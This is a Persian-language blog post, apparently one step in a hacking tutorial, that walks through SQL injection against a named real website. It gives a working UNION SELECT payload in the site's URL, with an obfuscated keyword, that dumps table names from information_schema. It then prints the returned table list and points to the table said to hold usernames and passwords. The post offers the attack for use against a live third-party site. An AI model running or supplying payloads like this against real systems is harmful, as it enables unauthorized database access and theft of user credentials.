به نام خدا

خوب دوستان تا به اینحا ما توانستیم که سایت رو از نظر نفوذ پذیری تست کنیم و اطلاعات لازم رو از آن بیرون بکشیم که در این مرحله از آموزش چگونگی بیرون

کشیدن تیبل ها رو نشان می دهیم :


http://www.discover.com.pa/english/pa_index.php?id=-31%27+/*!50000uNion+select*/+1,2,group_concat%28table_name%29,4+from+information_schema.tables--+

 group_concat(table_name)همان طور که مشاهده می کنید ما از چند دستور جدید در تارکت استفاده کردیه ایم مورد اول دستور

information_schemaمی باشد کار این دستور بیرون مشیدن تمام تیبل های سایت می باشد و اما دستور

.این یکی از دیتابیس های موجود در سایت است که ممکن  است تیبل ادمین در آن باشد

خوب حالا اگر این دستور را احرا کنیم تیبل های مجود در این دیتابیس نمایش داده می شود

CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,
INDEX_STATISTICS,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,
PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,
SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,THREAD_STATISTICS,
TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_BUFFER_PAGE,INNODB_TRX,INNODB_BUFFER_POOL_STATS,
INNODB_LOCK_WAITS,INNODB_CMPMEM,INNODB_CMP,INNODB_LOCKS,INNODB_CMPMEM_RESET,INNODB_CMP_RESET,
INNODB_BUFFER_PAGE_LRU,collection,collection2permission,cr_news,news,page,permission,productos,user,user2collection

خوب همان طور که مشاهده می کنید تیبلی که در آن یورزر و پسورد نگه داشته می شود به رنگ قرمز مشخص شده

نوشته شده در تاریخ چهارشنبه 21 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()